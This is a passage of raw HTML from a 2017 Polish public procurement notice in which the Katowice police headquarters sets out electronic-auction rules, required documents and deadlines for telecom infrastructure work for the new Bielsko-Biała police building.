</b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Dokumenty, które należy załączyć do wniosku o dopuszczenie do licytacji elektronicznej (załącznik nr1 do ogłoszenia): 1. . Oświadczenia wymagane na podstawie art. 25a ust. 1 ustawy Pzp, złożone naformularzu stanowiącym załącznik nr 5 i 6 do ogłoszenia oraz aktualne na dzień składania wniosku.UWAGA: a) Wykonawca, który zamierza powierzyć wykonanie częścizamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia zudziału w postępowaniu zobowiązany jest do zamieszczenia informacji o podwykonawcach we wskazanym wyżej oświadczeniu. c) W przypadku wspólnego ubiegania się o zamówienie wskazanewyżej oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. 2. odpis z właściwego rejestru lub zcentralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisudo rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5pkt 1 ustawy 3. Dokumenty, które winien złożyć zwycięzca licytacji elektronicznej: 1.Formularz ofertowy - załącznik nr 7 do ogłoszenia zawierające oświadczenie w zakresie udzielonej gwarancji oraz o jakości produktu. 4. W przypadku wskazaniaprzez wykonawcę dostępności oświadczeń lub dokumentów, o których mowa w niniejszym rozdzialew szczególności punktów 2, w formie elektronicznej pod określonymi adresami internetowymiogólnodostępnych i bezpłatnych baz danych, zamawiający pobiera samodzielnie z tych baz danychwskazane przez wykonawcę oświadczenia lub dokumenty. 5. W przypadku wskazania przezwykonawcę oświadczeń lub dokumentów, o których mowa w niniejszym rozdziale w szczególności wpunkcie 2 , które znajdują się w posiadaniu zamawiającego, w szczególności oświadczeń lubdokumentów przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 ustawy, zamawiający wcelu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy, korzysta zposiadanych oświadczeń lub dokumentów, o ile są one aktualne. 6. W przypadku składania ofertyprzez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, każdy zpodmiotów występujących w konsorcjum musi przedłożyć w ofercie dokumenty określone w sekcji 3.Dokumenty i oświadczenia w pozostałym zakresie mogą przedstawić łącznie. W przypadkudoświadczenia za spełnienie warunku w zakresie doświadczenia wykonania robót zostanie uznana wprzypadku kiedy jedną z robót wykona w całości jeden z członków konsorcjum albo dwie.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp"></span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"> www.licytacje.uzp.gov.pl</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"> http://bip.katowice.kwp.policja.gov.pl/KWK/zamowienia-publiczne/katalog-zamowien-publi</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">1. Wymagania formalne: 1.1. Licytacja prowadzona będzie na platformie Urzędu ZamówieńPublicznych znajdującej się na stronie https://licytacje.uzp.gov.pl 1.2. Z platformy w pełnym zakresiemogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresemhttps://licytacje.uzp.gov.pl 1.3. Wykonawca powinien dokonać rejestracji przed złożeniem wniosku odopuszczenie do udziału w licytacji. Przy rejestracji na platformie Wykonawca otrzyma loginidentyfikator użytkownika. 1.4.Od Wykonawców chcących wziąć udział w przedmiotowej licytacji niejest wymagany podpis elektroniczny. 1.5. Wykonawca, aby umożliwić Zamawiającemu dopuszczeniego do udziału w licytacji, winien wraz z wnioskiem o dopuszczenie go do udziału w licytacjiprzekazać informację o swoim loginie. Login winien być przekazany Zamawiającemu w oryginalnejpisowni tzn. z zachowaniem pisowni dużych i małych liter, numerów, spacji itp. Uwaga: Nie należyprzesyłać swojego hasła Zamawiającemu, nie należy też udostępniać hasła osobom nieuprawnionym.1.6. W przypadku podania przez Wykonawcę niewłaściwego loginu bądź nie przekazania goZamawiającemu wraz z wnioskiem będzie skutkowało brakiem możliwości wzięcia udziałuWykonawcy w licytacji. 2. Wymagania techniczne urządzeń informatycznych, umożliwiającychsprawne korzystanie z niniejszego systemu: 2.1. Komputer klasy PC z systemem operacyjnymWindows/Linux oraz przeglądarka internetowa Internet Explorer 6.0 lub wyższa lub Firefox 2.0 lubwyższa. 2.2. Zamawiający informuje wg danych Urzędu Zamówień Publicznych, platforma zostałaprzetestowana w zakresie współpracy z przeglądarkami Mozilla Firefox 2.0 i 3.0 oraz InternetExplorer w wersji 6.0 oraz 7.0; w związku z powyższym Urząd Zamówień Publicznych zalecaużytkownikom korzystanie z ww. przeglądarek internetowych. 2.3. Zarówno Zamawiający jak i UrządZamówień Publicznych nie ponosi odpowiedzialności za nieprawidłowości wynikające z korzystaniaprzez Wykonawców z oprogramowania innego niż zalecane.</span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9">1. Licytacja elektroniczna na przedmiot zamówienia będzie licytacją jednoetapową. 2. Po zalogowaniusię na platformie, Wykonawcy dopuszczeni do udziału w licytacji uzyskują dostęp do aplikacjiumożliwiającej składanie ofert - postąpień. 3. W toku licytacji elektronicznej Wykonawcy składająswoje oferty cenowe w postaci elektronicznej. 4. W toku licytacji elektronicznej Wykonawcydopuszczeni do udziału w licytacji składają kolejne korzystniejsze postąpienia. Możliwość złożeniapostąpienia istnieje od otwarcia licytacji do jej zamknięcia w wyznaczonym terminie. 5. Ofertazłożona w toku licytacji przestaje wiązać gdy inny Wykonawca złożył ofertę korzystniejszą. 6. W tokulicytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz w groszach;grosze należy oddzielić od złotych kropką. 7. Cenę oferty brutto stanowi łączny koszt wykonaniazamówienia oraz wszystkie inne koszty z tym związane. Przed przystąpieniem do złożeniapostąpienia Wykonawca winien obliczyć cenę oferty tak, aby cena z kosztorysu ofertowego dawałamaksymalnie wylicytowaną wartość brutto. 8. Oferta złożona przez Wykonawcę winna być niższa odoferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 9. Zamawiający przyjął za minimalne postąpienie wartość 500,00PLN (kwota, o którą można pomniejszyć kolejną składaną ofertę, liczona od oferty najkorzystniejszej).System nie przyjmie postąpienia, którego wysokość jest mniejsza od określonego minimalnegopostąpienia. 10. Sposób podawania ceny oferty kwota określana jest w złotych oraz w groszach (jeżeliwystępują grosze, wpisujemy je po kropce, np.: 180000.00 obowiązuje dokładność do dwóch miejscpo kropce) Uwaga: Wykonawca nie może cofnąć raz złożonej oferty (prosimy o uważne wpisywanieoferowanych kwot i sprawdzanie ich przed naciśnięciem przycisku złóż postąpienie). 11. W celuzapewnienia aktualności listy postąpień niezbędne będzie samodzielne odświeżanie ekranu przyużyciu przycisku przeglądarki internetowej system nie dokonuje odświeżania automatycznie. 12. Wtoku licytacji system platformy licytacyjnej UZP na bieżąco udostępnia wszystkim Wykonawcominformacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacjielektronicznej, a także o cenach złożonych ofert.</span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: 10</span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2017-10-12</span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 10:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">5 dni od dnia przekazania Wykonawcom zaproszenia do składania ofert, godzina 10:00</span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">Licytacja zostanie zamknięta jeżeli w ciągu 10 minut od złożenia najkorzystniejszego postąpienia,żaden z Wykonawców nie złoży korzystniejszego postąpienia</span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Zgodnie z treścią wzoru umowy stanowiący załącznik nr 2 do ogłoszenia</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Nie dotyczy </span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zgodnie z treścią projektu umowy stanowiący załącznik nr 2 do ogłoszenia oraz ustawa PZP</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-10-12</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">PL</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">I. CENA: 1. Wykonawca, który wygra licytację, przed zawarciem umowy wypełni i dostarczyZamawiającemu Formularz ofertowy - załącznik nr 7 do ogłoszenia dostępny na stroniewww.bip.katowice.kwp.policja.gov.pl. II.PRZEKAZANIE WNIOSKU O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI: 1. Wniosek ma byćzłożony w zamkniętej, zabezpieczonej kopercie (kopertach) nie jest dopuszczalne złożenie wniosku wformie elektronicznej za sposób zabezpieczenia kopert/y odpowiada Wykonawca. 2. Koperta ma byćzaadresowana na Zamawiającego i oznaczona: Wniosek o dopuszczenie do udziału w licytacjielektronicznej na: ZP-2380-385-86/2017 Przygotowanie infrastruktury teletechnicznej w celu przeniesienia usług realizowanych po kablach telekomunikacyjnych Policji z aktualnej siedziby KMP Bielsko Biała przy ul. |Rychlińskiego do nowe budowanego obiektu KMP w Bielsku Białej przy ul. Wapiennej . Adres Zamawiającego: KomendaWojewódzka Policji w Katowicach Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19 Nieotwierać przed komisyjnym otwarciem wniosków. 3. Ponadto koperta winna spełniać warunekuniemożliwiający odczytanie jej zawartości i oznaczona nazwą (firmą) i adresem Wykonawcy z uwagi napkt. 4. 4. Wnioski złożone po terminie nie będą rozpatrywane. Wszystkie wnioski otrzymane po terminieskładania zostaną zwrócone Wykonawcom po upływie ostatecznego terminu składania wniosków. IIIOPIS SPOSOBU PRZYGOTOWANIA WNIOSKÓW: 1. Wykonawca składa: wypełniony wniosek odopuszczenie do udziału w postępowaniu wg. wzoru załącznika nr 1 do ogłoszenia oraz dokumenty izałączniki wskazane w Sekcji III.7. ogłoszenia 2. Wniosek o dopuszczenie do udziału w postępowaniuoraz wszystkie załączniki w tym dokumenty i oświadczenia, mają być w całości sporządzone w językupolskim, ręcznie, na maszynie do pisania lub komputerze (w sposób czytelny) oraz podpisany w sposóbokreślony pkt. 3 przez osoby uprawnione Nie dotyczy załączników składanych, jako oryginaływystawione i podpisane przez uprawnione organy np. KRS. 3. Wszystkie dokumenty w złożonej oferciemuszą być opieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnionei opieczętowane pieczęciami firmowymi lub sporządzone na papierze firmowym i podpisane czytelnieprzez osoby uprawnione. Osoba uprawniona to osoba, która jest wymieniona w aktualnym odpisie zwłaściwego rejestru lub działająca z jej upoważnienia Dokumenty wielostronicowe mogą byćopieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione iopieczętowane pieczęciami firmowymi lub sporządzone na papierze firmowym i podpisane czytelnieprzez osoby uprawnione na pierwszej lub ostatniej jego stronie. Dokumenty mogą być składane w formieoryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem przez Wykonawcę.W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego oraz wprzypadku innych podmiotów, na zasobach których Wykonawca polega kopie dokumentów dotyczącychodpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednioprzez Wykonawcę lub te podmioty. W przypadku składania dokumentów wydanych w języku innym niżjęzyk polski, dokumenty te są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Uwaga: Przez podpis czytelny Zamawiający rozumie podpis odręczny, zawierający imię inazwisko pozwalający na identyfikację osoby, która go złożyła. 4. W przypadku spółek prawahandlowego zmiany w składzie zarządu są skuteczne z chwilą podjęcia uchwały przez odpowiedni organ.Skuteczność takiej uchwały nie jest uzależniona od dokonania odpowiedniego wpisu w KRS.Wystarczającym będzie, że Wykonawca dołączy do oferty dotychczas obowiązujący KRS i uchwałę ozmianie zarządu. 5. W przypadku podpisywania wniosku przez osobę nie wymienioną w aktualnymodpisie z właściwego rejestru, niezbędne jest we wniosku pełnomocnictwo dla osoby działającej wimieniu Wykonawcy w formie oryginału lub jego poświadczonej notarialnie kopii. Pełnomocnictwo wsposób jednoznaczny ma określać, do jakich czynności upoważniona jest osoba podpisująca wniosek odopuszczenie do udziału w postępowaniu. 6. W przypadku Wykonawców ubiegających się wspólnie (np.konsorcjum) o udzielenie zamówienia publicznego na podstawie art. 23 ust. 2 ustawy PZP wynikaobowiązek ustanowienia pełnomocnika do reprezentowania ich w prowadzonym postępowaniu lub doreprezentowania w postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jestprzedłożenie we wniosku pełnomocnictwa w formie oryginału lub jego poświadczonej notarialnie kopii wcelu ustalenia podmiotu uprawnionego do występowania w imieniu grupy Wykonawców w sposóbumożliwiający identyfikację Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Uwaga:W przypadku spółki cywilnej, wspólnicy nie przedstawiają osobnego dokumentu zawierającegopełnomocnictwo, jednakże uprawnienia do reprezentacji spółki przysługujące każdemu ze wspólnikówma 